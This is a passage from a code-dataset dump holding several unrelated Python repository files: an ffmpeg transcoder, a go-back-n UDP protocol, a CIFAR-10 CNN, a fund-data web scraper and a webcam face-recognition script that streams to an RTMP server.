sling.pysling as api\n\nfrom sling.log import *\nfrom sling.nlp.document import *\nfrom sling.nlp.parser import *\n\nVERSION = \"3.0.0\"\n\nStore = api.Store\nFrame = api.Frame\nArray = api.Array\nString = api.String\n\nRecordReader = api.RecordReader\nRecordDatabase = api.RecordDatabase\nRecordWriter = api.RecordWriter\nDatabase = api.Database\n\nPhraseTable = api.PhraseTable\nCalendar = api.Calendar\nDate = api.Date\n\nWikiConverter = api.WikiConverter\nFactExtractor = api.FactExtractor\nPlausibilityModel = api.PlausibilityModel\nWikipedia = api.Wikipedia\nWebArchive = api.WebArchive\nWebsiteAnalysis = api.WebsiteAnalysis\nSubtokenizer = api.Subtokenizer\n\nMILLENNIUM = api.MILLENNIUM\nCENTURY = api.CENTURY\nDECADE = api.DECADE\nYEAR = api.YEAR\nMONTH = api.MONTH\nDAY = api.DAY\n\nCASE_INVALID = api.CASE_INVALID\nCASE_NONE = api.CASE_NONE\nCASE_UPPER = api.CASE_UPPER\nCASE_LOWER = api.CASE_LOWER\nCASE_TITLE = api.CASE_TITLE\n\nDBOVERWRITE = api.DBOVERWRITE\nDBADD = api.DBADD\nDBORDERED = api.DBORDERED\nDBNEWER = api.DBNEWER\n\nDBNEW = api.DBNEW\nDBUPDATED = api.DBUPDATED\nDBUNCHANGED = api.DBUNCHANGED\nDBEXISTS = api.DBEXISTS\nDBSTALE = api.DBSTALE\nDBFAULT = api.DBFAULT\n\n# Print out version and location of SLING Python API.\ndef which():\n import os\n import time\n location = __path__[0]\n if (os.path.islink(location)): location += \" -> \" + os.readlink(location)\n ts = time.ctime(os.path.getmtime(sling.api.__file__))\n print(\"SLING API version %s (%s) in %s\" % (VERSION, ts, location))\n\n","repo_name":"ringgaard/sling","sub_path":"python/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"32"} +{"seq_id":"14989560226","text":"import os\nimport math\nimport json\nimport subprocess\nfrom glob import glob\nfrom time import time\n\n\nclass FFmpegException(Exception):\n pass\n\n\nclass Transcoder(object):\n\n BASE_FFMPEG_OPTIONS = [\n \"-v\", \"error\",\n \"-stats\",\n ]\n CHUNK_LIST_FILENAME = \"chunks.txt\"\n CHUNK_FILENAME_BASE = \"chunk\"\n CHUNK_FILENAME_SEGMENT_FORMAT = \"%d\"\n CHUNK_FILENAME_GLOB_FORMAT = \"*\"\n\n def __init__(self, input_file, width=None, height=None, is_chunk=False):\n if not os.path.isfile(input_file):\n raise FileNotFoundError(input_file)\n\n self.__input = input_file\n self.__dir = os.path.dirname(input_file)\n self.__name, self.__ext = 
os.path.splitext(input_file)\n\n # .../chunks.txt\n self.__chunk_list_filepath = os.path.join(\n self.__dir, self.CHUNK_LIST_FILENAME\n )\n # .../chunk\n self.__chunk_base_path = os.path.join(\n self.__dir, self.CHUNK_FILENAME_BASE\n )\n # .../chunk%d.ext\n self.__chunk_filepath = ''.join((\n self.__chunk_base_path,\n self.CHUNK_FILENAME_SEGMENT_FORMAT,\n self.__ext\n ))\n # .../chunk*.ext\n self.__chunk_globpath = ''.join((\n self.__chunk_base_path,\n self.CHUNK_FILENAME_GLOB_FORMAT,\n self.__ext\n ))\n\n if is_chunk:\n assert width and height\n self.__width = width\n self.__height = height\n else:\n self.__info = self.__get_file_info_json()\n self.__width = self.__info[\"streams\"][0][\"width\"]\n self.__height = self.__info[\"streams\"][0][\"height\"]\n self.__duration = float(self.__info[\"format\"][\"duration\"])\n\n def __get_file_info_json(self):\n options = [\n '-v', 'error',\n '-print_format', 'json',\n '-show_format',\n '-show_streams'\n ]\n return json.loads(subprocess.check_output(\n ['ffprobe'] + options + [self.__input]\n ).decode())\n\n @property\n def dimensions(self):\n return self.__width, self.__height\n\n @property\n def chunk_files(self):\n if os.path.isfile(self.__chunk_list_filepath):\n files = []\n with open(self.__chunk_list_filepath, \"r\") as chunk_list:\n for line in chunk_list:\n if line.startswith(\"file \"):\n files.append(\n os.path.join(\n self.__dir,\n line.lstrip(\"file \").rstrip()\n )\n )\n return files\n print(\"No chunk list file present.\")\n return None\n\n def transsize(self, height, aspect_ratio, chunk_file=''):\n \"\"\"\n Change picture size of input file or given chunk file.\n Chunk files will be overwritten.\n \"\"\"\n if height < self.__height:\n if chunk_file and not os.path.isfile(chunk_file):\n raise FileNotFoundError(chunk_file)\n width = int(height * aspect_ratio)\n input = chunk_file or self.__input\n name = os.path.splitext(chunk_file)[0] or self.__name\n options = self.BASE_FFMPEG_OPTIONS + [\n '-i', input,\n # '-pix_fmt', 'yuv420p',\n '-vf', 'scale={}:{},format=pix_fmts=yuv420p'.format(width, height),\n ]\n # Recorded times\n # 320.55 - no pixel format\n # 312.36 - -pix_fmt\n # 302.20 - (BEST) format=pix_fmts\n output = \"{name}_{w}_{h}{ext}\".format(\n name=name, w=width, h=height, ext=self.__ext\n )\n info = \"{} {}x{} -> {}x{}\".format(\n os.path.basename(input),\n self.__width, self.__height,\n width, height\n )\n print(info)\n print(\"-\" * len(info))\n subprocess.call(['ffmpeg'] + options + [output])\n print()\n if chunk_file:\n # cannot overwrite file while transcoding so replace now\n os.rename(output, chunk_file)\n else:\n print(\"Cannot transsize. 
Height ({}) is greater than input \"\n \"file height ({}).\".format(height, self.__height))\n\n def transcode(self):\n \"\"\"\n Convert encoding of input file to given encoding.\n \"\"\"\n pass\n\n def transrate(self):\n \"\"\"\n Decrease bitrate of input file.\n \"\"\"\n pass\n\n def split(self, num_chunks):\n print(\"Splitting into {} chunks.\".format(num_chunks))\n chunk_time = self.get_chunk_time(num_chunks)\n # TODO: check if Timecode frame rate is specified (required for segmenting)\n try:\n self.__split_with_segment(chunk_time)\n except FFmpegException:\n print(\"Failed to split using FFmpeg segment option, falling back to manual splitting.\")\n self.__split_by_seeking(num_chunks, chunk_time)\n\n def get_chunk_time(self, num_chunks):\n return math.ceil(self.__duration / num_chunks)\n\n def __split_with_segment(self, chunk_time):\n options = self.BASE_FFMPEG_OPTIONS + [\n '-i', self.__input,\n '-c', 'copy',\n '-f', 'segment',\n '-segment_time', str(chunk_time),\n '-segment_list', self.__chunk_list_filepath,\n '-segment_list_type', 'ffconcat',\n '-reset_timestamps', '1',\n '-map', '0'\n ]\n try:\n subprocess.check_call(['ffmpeg'] + options + [self.__chunk_filepath])\n except subprocess.CalledProcessError as e:\n self.__remove_chunk_files()\n raise FFmpegException(e)\n\n def __split_by_seeking(self, num_chunks, chunk_time):\n for i in range(num_chunks):\n self.seek_split(i, chunk_time)\n # append to chunk list file\n with open(self.__chunk_list_filepath, \"a\") as chunk_list_file:\n chunk_list_file.write(\"file {}\\n\".format(\n ''.join((self.CHUNK_FILENAME_BASE, str(i), self.__ext))\n ))\n\n def seek_split(self, chunk_num, chunk_time):\n options = self.BASE_FFMPEG_OPTIONS + [\n '-ss', str(chunk_num * chunk_time),\n '-t', str(chunk_time),\n '-i', self.__input,\n '-c', 'copy',\n ]\n output = ''.join((self.__chunk_base_path, str(chunk_num), self.__ext))\n subprocess.call(['ffmpeg'] + options + [output])\n\n def stitch(self, suffix=None):\n print(\"Stitching...\")\n options = self.BASE_FFMPEG_OPTIONS + [\n '-f', 'concat',\n '-safe', '0',\n '-i', self.__chunk_list_filepath,\n '-c', 'copy'\n ]\n suffix = suffix or time()\n output = \"{name}_{suffix}{ext}\".format(\n name=self.__name, suffix=suffix, ext=self.__ext\n )\n subprocess.call(['ffmpeg'] + options + [output])\n self.__remove_chunk_files()\n\n def __remove_chunk_files(self):\n os.remove(self.__chunk_list_filepath)\n for chunk_file in glob(self.__chunk_globpath):\n os.remove(chunk_file)\n","repo_name":"Palisand/ffperf","sub_path":"transcoder.py","file_name":"transcoder.py","file_ext":"py","file_size_in_byte":7239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4063721729","text":"from socket import *\n\nserverName = '127.0.0.1'\nserverPort = 12000\nclientSocket = socket(AF_INET,SOCK_STREAM)\nclientSocket.connect((serverName,serverPort))\n\nwhile True:\n print('Pick Either: Random, Add or Subtract: ')\n case = input()\n while case != 'Random' and case != 'Add' and case != 'Subtract':\n print('Pick Either: Random, Add or Subtract: ')\n case = input()\n\n orderImportant = True\n \n while orderImportant:\n print('Pick first number: ')\n firstNumber = int(input())\n \n print('Pick second number: ')\n secondNumber = int(input())\n \n if secondNumber > firstNumber and case == 'Random':\n orderImportant = False\n elif secondNumber < firstNumber and case == 'Random':\n print('Second number must be greater than first number')\n elif firstNumber == secondNumber and case == 
'Random':\n print('First and second is equal')\n \n if case == 'Add' or case == 'Subtract':\n orderImportant = False\n\n\n sendString = str(case+','+str(firstNumber)+','+str(secondNumber)).encode()\n clientSocket.send(sendString)\n recievedResult = clientSocket.recv(1024).decode()\n print(recievedResult)","repo_name":"NHThomsen/ObgOpg4","sub_path":"TcpClient/TcpClient/TcpClient.py","file_name":"TcpClient.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"75002070490","text":"import json\nimport requests\nimport os\n\n\ndef read_file(file_path):\n with open(file_path, 'r') as f:\n data = f.read()\n f.close()\n return data\n\ndef get_address(fog05_api,entity,interface):\n result = fog05_api.fdu.instance_info(entity)['hypervisor_info']['network'][interface]['addresses'][0]['address']\n print('Indirizzo: ' + result)\n return result\n\ndef load_descriptor(descriptor):\n return json.loads(read_file(descriptor))\n\ndef get_data_files(data):\n result = {}\n for node in os.listdir(data):\n if 'DS_Store' not in node:\n node_path = os.path.join(data, node)\n result[node] = {}\n for dataset in os.listdir(node_path):\n if 'DS_Store' not in dataset:\n dataset_path = os.path.join(node_path, dataset)\n index = int(dataset)\n result[node].update({index: {}})\n for file in os.listdir(dataset_path):\n result[node][index].update({file: os.path.join(dataset_path, file)})\n return result\n\ndef load_data(address, files):\n endpoint = 'http://' + address + '/load_data'\n r = requests.post(endpoint, files=files)\n\ndef __check_compatibility(node, constraint, value):\n\t# Sottrarre alla capacità del nodo le risorse necessarie all'allocazione dei nodi già in esecuzione e mappati su di esso e controllare se la differenza basta a mappare l'entità considerata\n\treturn True\n\t'''\n\tif requirement == 'os':\n\t\tif self.fog05_api.node.info(node)[constraint] == value:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\telif requirement == 'ram':\n\t\tif self.fog05_api.node.info(node)[constraint] == value:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\t'''\n\t# Da implementare:\n\t# cpu, disks, io, accelerator, network, position\n\t# Guardare il file fos_types.atd\n\ndef get_nodes_mapping(fog05_api, arch_requirements, environment):\n\tnodes = fog05_api.node.list()\n\tif len(nodes) == 0:\n\t\tprint('No compatible mapping found!')\n\t\treturn None\n\n\tresult = {}\n\tfor entity, node_requirements in arch_requirements.items():\n\t\tfor node in nodes:\n\t\t\tcompatible = True\n\t\t\tfor constraint, value in node_requirements.items():\n\t\t\t\tcompatible = __check_compatibility(node, constraint, value)\n\t\t\tif compatible:\n\t\t\t\tresult[entity] = node\n\t\t\t\tbreak\n\n\tif len(result.keys()) == len(arch_requirements.keys()):\n\t\treturn result\n\telse:\n\t\treturn None\n","repo_name":"Davide-DD/fog05-orchestrator","sub_path":"src/architecture_repository/architectures/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"19852381008","text":"import socket\nimport _thread\nimport sys\nimport utils\nimport argparse\nfrom utils import Timer\nimport time\nimport random\n\n# Parameters used in this implementation\nLOWER_LIMT_PACKET= 64\nUPPER_LIMIT_PACKET= 256\nWINDOW_SIZE= 7\n# WINDOW_SIZE= 7\n# WINDOW_SIZE= 9\n# WINDOW_SIZE= 2\nTIMEOUT=0.5 # give a timeout after 0.5 seconds of no 
ack\nSENDER_ADDRESS= ('10.0.0.1', 9999)\n# SENDER_ADDRESS= ('localhost', 9999)\nRECEIVER_ADDRESS=('10.0.0.2', 8080 )\n# RECEIVER_ADDRESS=('localhost', 8080 )\nPERIOD= 0.05\n\n# lock to be used \nlock=_thread.allocate_lock() \n# initialise last ack\nlast_ack=-1 \n# make a timer object to keep track of time\nsend_timer = Timer(TIMEOUT)\n\n#open file and convert to bytes\ndef receiving_ack(sock):\n \"\"\" Helper function that would run on a thread,\n to keep a check for receiving ack in the senders side \"\"\"\n global lock\n global last_ack\n global send_timer\n\n while True:\n # receive packet and extract\n packet = utils.receive_packet(sock)[0]\n ack = utils.extract_packet(packet)[0]\n print(\"Received Ackowlegement for packet number \",ack )\n # if ack received was greater than what was stored as last \n # acknoledged ack then sender should increment the last ack variable\n # and stop the timer \n # if the sender is sending packets this function \n # would wait till that ends by the means of lock\n if(ack>=last_ack):\n lock.acquire()\n last_ack=ack\n send_timer.stop()\n lock.release()\n\ndef sender(filename):\n # main sender function\n global lock\n global last_ack\n global send_timer\n\n seq_num = 0\n \n # open file for reading \n file = open(filename, 'rb')\n # open a socket in the sender side\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind(SENDER_ADDRESS) \n \n # list to store all packets\n all_packets=[]\n\n while True:\n # packet size which is randomly chosen\n packet_size = (int)(random.randint(LOWER_LIMT_PACKET, UPPER_LIMIT_PACKET+1))\n data_packet = file.read(packet_size)\n \n if not data_packet:\n # if all the packets have been send then break\n break\n\n # make the data packet and increment the seq_num\n data_packet = utils.make_packet(seq_num, data_packet)\n seq_num += 1\n\n all_packets.append(data_packet)\n\n # now that i have created all my data\n num_packets= len(all_packets)\n # sender will be receiving on another thread\n _thread.start_new_thread(receiving_ack,(sock,))\n\n\n while last_ack < num_packets-1:\n print(\"Last ack is \", last_ack) \n print(\"Num Packets is \", num_packets) \n # if the receiving ack business is not done the lock will not be freed\n lock.acquire()\n #send n(window size) packets of size\n for i in range(1,min(WINDOW_SIZE, num_packets-last_ack)):\n #send n packets\n utils.send_packet(all_packets[last_ack+i],sock, RECEIVER_ADDRESS)\n # last_sent=last_ack+i;\n\n\n #while waiting for timeout check for acks in between \n if not send_timer.running():\n # start the timer\n send_timer.start()\n\n #\n while not send_timer.timeout() and send_timer.running():\n lock.release()\n time.sleep(PERIOD)\n lock.acquire()\n\n if send_timer.timeout():\n send_timer.stop()\n print(\"timeout\")\n else:\n pass\n #last_ack has been updated in the receive function\n\n # once all the window has been sent and ack or timeout has occurred begin again \n lock.release()\n\n # sending an empty packet to show end of transmission\n utils.send_packet(b'',sock,RECEIVER_ADDRESS)#to confirm completion\n file.close()\n\n sock.close()\n\ndef receive(sock, filename):\n # open file for writing the received packets\n with open(filename, 'wb') as file:\n # starting with the expected frame of sequence number 0\n exp_frame = 0\n while True:\n # get the next packet from the sender\n pkt, addr = utils.receive_packet(sock)\n \n if not pkt:\n # empty packet therefore end of transmission\n break\n\n # extract the sequence number and data from the packet\n seq_num, data = 
utils.extract_packet(pkt)\n\n if seq_num == exp_frame:\n # if the sequence number is equal to the expected frame then send an ack and\n # increment the expected frame number\n pkt = utils.make_packet(exp_frame)\n utils.send_ack(pkt, sock, addr)\n exp_frame += 1\n \n print(\"Received Sequence number \", seq_num)\n # write the frame into the file\n file.write(data)\n else:\n # send a ack for the last received frame since it might have been \n # dropped if the expected frame sequence has not come.\n # so that the sender would update it's last ack\n print(\"Requested Sequence number \", exp_frame-1)\n pkt = utils.make_packet(exp_frame-1)\n utils.send_ack(pkt, sock, addr)\n\n\ndef receiver(filename):\n # open a socket at the receiver's end\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind(RECEIVER_ADDRESS)\n receive(sock, filename)\n sock.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--receiver\", help=\"start receiver\", action=\"store_true\")\n parser.add_argument(\"--sender\", help=\"start sender\", action=\"store_true\")\n parser.add_argument(\"--filename\", help=\"File name\", type=str, required=True)\n args = parser.parse_args()\n \n if args.receiver:\n print(\"Started the receiver\")\n receiver(args.filename)\n else:\n print(\"Started the sender\")\n sender(args.filename)\n","repo_name":"4rshdeep/go-back-n-protocol","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36930122990","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 18 10:36:27 2018\n\n@author: Francisco\n\"\"\"\n\n# Importacion de modulos\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\ndef pruebas():\n \n sig_type = { 'tipo': 'senoidal', \n 'frecuencia': (3, 10, 20), # Uso de tuplas para las frecuencias \n 'amplitud': (1, 1, 1),\n 'fase': (0, 0, 0)\n } \n # Como también puedo agregar un campo descripción de manera programática\n # este tipo de sintaxis es *MUY* de Python\n sig_type['descripcion'] = [ str(a_freq) + ' Hz' for a_freq in sig_type['frecuencia'] ]\n\n # Datos generales de la simulación\n fs = 1000.0 # frecuencia de muestreo (Hz)\n N = 10 # cantidad de muestras\n \n ts = 1/fs # tiempo de muestreo\n \n # grilla de sampleo temporal\n tt = np.linspace(0, (N-1)*ts, N)\n print(tt)\n \n # Concatenación de matrices:\n # Creamos una matriz vacia con np.array. 
Luego, con reshape hacemos que sea una matriz vacia de N filas y 1 columna\n    # Guardaremos las señales creadas al ir poblando la siguiente matriz vacía\n    \n    x = np.array([], dtype=np.float)\n    print(x)\n    x = x.reshape(N,0)\n    print(x)\n\n    for this_amp, this_freq, this_phase in zip(sig_type['amplitud'], sig_type['frecuencia'], sig_type['fase']):\n        # prestar atención que las tuplas dentro de los diccionarios también pueden direccionarse mediante \"ii\"\n        aux = this_amp * np.sin( 2*np.pi*this_freq*tt + this_phase )\n        print(aux)\n        aux = aux.reshape(N,1)\n        print(aux)\n        # para concatenar horizontalmente es necesario cuidar que tengan iguales FILAS\n        x = np.hstack([x, aux])\n        print(x)\n\npruebas()\n    \n    ","repo_name":"franmaiocchi/DSP","sub_path":"Ejemplos/prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30291288976","text":"# Simple CNN model for CIFAR-10\nimport numpy\nimport os\nimport pickle\nfrom keras.datasets import cifar10\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import Flatten\nfrom keras.constraints import maxnorm\nfrom keras.optimizers import SGD\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.convolutional import MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras import backend as K\nK.set_image_dim_ordering('th')\n\n# fix random seed for reproducibility\nseed = 7\nnumpy.random.seed(seed)\n# load data\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\n# normalize inputs from 0-255 to 0.0-1.0\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train = X_train / 255.0\nX_test = X_test / 255.0\n# one hot encode outputs\ny_train = np_utils.to_categorical(y_train)\ny_test = np_utils.to_categorical(y_test)\nnum_classes = y_test.shape[1]\n# Create the model\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=(3, 32, 32), padding='same', activation='relu', kernel_constraint=maxnorm(3)))\nmodel.add(Dropout(0.2))\nmodel.add(Conv2D(32, (3, 3), activation='relu', padding='same', kernel_constraint=maxnorm(3)))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Flatten())\nmodel.add(Dense(512, activation='relu', kernel_constraint=maxnorm(3)))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\n# Compile model\nepochs = 1\nlrate = 0.01\ndecay = lrate/epochs\nsgd = SGD(lr=lrate, momentum=0.9, decay=decay, nesterov=False)\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\nprint(model.summary())\n# Fit the model\nmodel.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=epochs, batch_size=32)\n# Final evaluation of the model\nscores = model.evaluate(X_test, y_test, verbose=0)\nprint(\"Accuracy: %.2f%%\" % (scores[1]*100))\n\n\nlabel_list_path = 'datasets/cifar-10-batches-py/batches.meta'\n\nkeras_dir = os.path.expanduser(os.path.join('~', '.keras'))\ndatadir_base = os.path.expanduser(keras_dir)\nif not os.access(datadir_base, os.W_OK):\n    datadir_base = os.path.join('/tmp', '.keras')\nlabel_list_path = os.path.join(datadir_base, label_list_path)\n\nwith open(label_list_path, mode='rb') as f:\n    labels = pickle.load(f)\nprint(\"Load label names %s\" % label_list_path)\n\n# Evaluate with test dataset and share same prediction results\nevaluation = model.evaluate_generator(datagen.flow(X_test, y_test, batch_size=batch_size),\n                                      steps=X_test.shape[0] // 
batch_size)\nprint('Model accuracy = %.2f' % evaluation[1])\n\npredict_gen = model.predict_generator(datagen.flow(X_test, y_test, batch_size=batch_size),\n                                      steps=X_test.shape[0] // batch_size)\nfor predict_index, predicted_y in enumerate(predict_gen):\n    actual_label = labels['label_names'][numpy.argmax(y_test[predict_index])]\n    predicted_label = labels['label_names'][numpy.argmax(predicted_y)]\n    print('Actual label = %s vs. Predicted label = %s' % (actual_label, predicted_label))","repo_name":"pallavidesai/PythonDeepLearningICP","sub_path":"DLICP5/src/image_classification_withLess COnvoLayer.py","file_name":"image_classification_withLess COnvoLayer.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37550939930","text":"# -*-coding:utf-8 -*-\nimport re\nimport csv\nimport time\nimport requests\nimport pandas as pd\nfrom load_to_data.loadData import loadData\n\n\nclass fundSpider(object):\n    ldata = loadData\n\n    def __init__(self):\n        self.headers = {\n            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',\n            'Referer': 'http://fund.eastmoney.com/data/fundranking.html'}\n        self.listPagePath = \"列表页.csv\"\n        self.historyPath = \"历史净值明细.csv\"\n        self.industryPath = \"行业.csv\"\n\n    def listPage(self): # 列表页\n        title = [\"基金代码\", \"基金简称\", \"日期\", \"单位净值\", \"累计净值\", \"日增长率\", \"近1周\", \"近1月\", \"近3月\", \"近6月\", \"近1年\", \"近2年\", \"近3年\", \"今年来\",\n                 \"成立以来\", \"手续费\"]\n        ed = str(time.strftime(\"%Y-%m-%d\")) # 今天的时间\n        for pi in range(1, 123):\n            url = \"http://fund.eastmoney.com/data/rankhandler.aspx?op=ph&dt=kf&ft=all&rs=&gs=0&sc=zzf&st=desc&sd={}&ed={}&qdii=&tabSubtype=,,,,,&pi={}&pn=50&dx=1\".format(\n                ed, ed, str(pi))\n            res = requests.get(url=url, headers=self.headers, timeout=10).content.decode()\n            print(res)\n            data_list = re.findall(r'\"(.*?)\"', res, re.S)\n            for data in data_list:\n                item_list = re.findall(r'(.*?),', data, re.S)\n                for num in [2, 15, 15, 15, 15]:\n                    del item_list[num]\n                for i in range(0, 3):\n                    item_list.pop()\n                print(pi, item_list)\n                self.ldata().to_mongo(title, item_list, \"page_vals\")\n\n    def history(self): # 历史净值明细\n        title = [\"基金代码\", \"基金简称\", \"日期\", \"单位净值\", \"累计净值\", \"日增长率\"]\n        df = pd.read_csv(self.listPagePath, encoding=\"utf-8\", dtype={\"基金代码\": str})\n        source_list = df.values.tolist()\n        y = 0\n        for source in source_list:\n            y += 1\n            url = \"http://api.fund.eastmoney.com/f10/lsjz?fundCode={}&pageIndex=1&pageSize=200\".format(source[0])\n            res = requests.get(url=url, headers=self.headers, timeout=10).content.decode()\n            data_list = re.findall(r'\"(.*?)\"', res, re.S)\n            num = 0\n            for data in data_list:\n                num += 1\n                if data == \"FSRQ\":\n                    day_growth = data_list[num + 11] # 日增长率\n                    if day_growth == \"FHFCZ\":\n                        day_growth = data_list[num + 6]\n                    item = [source[0], source[1], data_list[num], data_list[num + 2], data_list[num + 4], day_growth]\n                    print(y, item)\n                    self.ldata().to_mongo(title, item, \"history_vals\")\n\n    def industry(self): # 行业\n        title = [\"基金代码\", \"基金简称\", \"行业类别\", \"占净值比例\", \"市值(万元)\"]\n        df = pd.read_csv(self.listPagePath, encoding=\"utf-8\", dtype={\"基金代码\": str})\n        source_list = df.values.tolist()\n        y = 0\n        for source in source_list:\n            y += 1\n            self.headers[\"Referer\"] = \"http://fundf10.eastmoney.com/hytz_{}.html\".format(source[0])\n            url = \"http://api.fund.eastmoney.com/f10/HYPZ/?fundCode={}&year=2020\".format(source[0])\n            res = requests.get(url=url, headers=self.headers, 
timeout=10).content.decode()\n print(res)\n HYMC = re.findall(r'\"HYMC\":\"(.*?)\"', res, re.S) # 行业类别\n ZJZBL = re.findall(r'\"ZJZBL\":\"(.*?)\"', res, re.S) # 占净值比例\n SZDesc = re.findall(r'\"SZDesc\":\"(.*?)\"', res, re.S) # 市值(万元)\n num = 0\n for data in HYMC:\n item = [source[0], source[1], data, ZJZBL[num], SZDesc[num]]\n print(y, item)\n self.ldata().to_mongo(title, item, \"industry_vals\")\n num += 1\n\n\nif __name__ == '__main__':\n obj = fundSpider()\n obj.listPage() # 此方法每天执行\n # obj.history() # 此方法只要执行一次就可以了,每天执行obj.listPage()已经有该数据了\n # obj.industry() # 此方法一个月执行一次就可以了\n","repo_name":"PythonWithStart/address_all_start","sub_path":"Quant_all/fund_to_data.py","file_name":"fund_to_data.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70561097053","text":"import cv2\nimport queue\nimport os\n\nimport imutils\nimport numpy as np\nfrom threading import Thread\nimport datetime, _thread\nimport subprocess as sp\nimport time\n\nimport argparse\nfrom oldcare.facial import FaceUtil\nfrom PIL import Image, ImageDraw, ImageFont\nfrom oldcare.utils import fileassistant\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array\nimport cv2\nimport time\nimport numpy as np\nimport os\nimport imutils\nimport subprocess\n\n\nVIDEO_WIDTH = 640\nVIDEO_HEIGHT = 480\nANGLE = 20\n# 全局常量\n\nlimit_time = 2\n# 使用线程锁,防止线程死锁\nmutex = _thread.allocate_lock()\n# 存图片的队列\nframe_queue = queue.Queue()\n\nrtmpUrl = \"rtmp://39.97.107.19:1935/rtmplive\"\n\n# \"rtmp://39.97.107.19:1935/rtmplive\"\n\n\ncommand = ['ffmpeg',\n\n '-y',\n\n '-f', 'rawvideo',\n\n '-vcodec', 'rawvideo',\n\n '-pix_fmt', 'bgr24',\n\n '-s', \"{}x{}\".format(640, 480), # 图片分辨率\n\n '-r', str(13.0), # 视频帧率\n\n '-i', '-',\n\n '-c:v', 'libx264',\n\n '-pix_fmt', 'yuv420p',\n\n '-preset', 'ultrafast',\n\n '-f', 'flv',\n\n rtmpUrl]\n\n\ndef Video():\n # 调用相机拍图的函数\n\n vid = cv2.VideoCapture(0)\n time.sleep(2);\n if not vid.isOpened():\n raise IOError(\"Couldn't open webcam or video\")\n\n while (vid.isOpened()):\n return_value, frame = vid.read()\n\n # 原始图片推入队列中\n\n frame_queue.put(frame)\n frame_queue.get() if frame_queue.qsize() > 1 else time.sleep(0.01)\n\n\ndef push_frame():\n # 推流函数\n facial_recognition_model_path = 'info/face_recognition_hog.pickle' # jian ce ren lian\n facial_expression_model_path = 'models/face_expression_seven_class.hdf5' # fenxi qinggan\n\n output_stranger_path = 'supervision/strangers'\n output_smile_path = 'supervision/smile'\n\n people_info_path = 'info/people_info.csv'\n facial_expression_info_path = 'info/facial_expression_info_seven_class.csv'\n faceutil = FaceUtil(facial_recognition_model_path)\n facial_expression_model = load_model(facial_expression_model_path, compile=False)\n # 初始化人脸识别模型\n\n # your python path\n python_path = '/root/anaconda3/envs/tensorflow/bin/python'\n\n # 全局常量\n FACIAL_EXPRESSION_TARGET_WIDTH = 48\n FACIAL_EXPRESSION_TARGET_HEIGHT = 48\n\n ANGLE = 20\n\n # 得到 ID->姓名的map 、 ID->职位类型的map、\n # 摄像头ID->摄像头名字的map、表情ID->表情名字的map\n id_card_to_name, id_card_to_type = fileassistant.get_people_info(\n people_info_path)\n facial_expression_id_to_name = fileassistant.get_facial_expression_info(\n facial_expression_info_path)\n\n # 控制陌生人检测\n strangers_timing = 0 # 计时开始\n strangers_start_time = 0 # 开始时间\n strangers_limit_time = 2 # if >= 2 seconds, then he/she is a stranger.\n\n # 控制微笑检测\n facial_expression_timing = 0 # 计时开始\n facial_expression_start_time = 0 # 开始时间\n 
facial_expression_limit_time = 2 # if >= 2 seconds, he/she is smiling\n\n accum_time = 0\n\n curr_fps = 0\n\n fps = \"FPS: ??\"\n\n # prev_time = time()\n\n # 防止多线程时 command 未被设置\n\n while True:\n print('command lenth', len(command))\n if len(command) > 0:\n # 管道配置,其中用到管道\n\n p = sp.Popen(command, stdin=sp.PIPE)\n\n break\n\n while True:\n faceutil = FaceUtil(facial_recognition_model_path)\n facial_expression_model = load_model(facial_expression_model_path, compile=False)\n if frame_queue.empty() != True:\n counter = 0\n\n while True:\n counter += 1\n image = frame_queue.get()\n\n\n image=cv2.flip(image, 1)\n\n image = imutils.resize(image, width=VIDEO_WIDTH,\n height=VIDEO_HEIGHT) # 压缩,加快识别速度\n\n # if counter%10!=0:\n # \tcv2.imshow(\"Checking Strangers and Ole People's Face Expression\",\n # \t\t\t image)\n #\n # \t# Press 'ESC' for exiting video\n # \tk = cv2.waitKey(1) & 0xff\n # \tcontinue\n\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) # grayscale,表情识别\n\n # if True:\n # 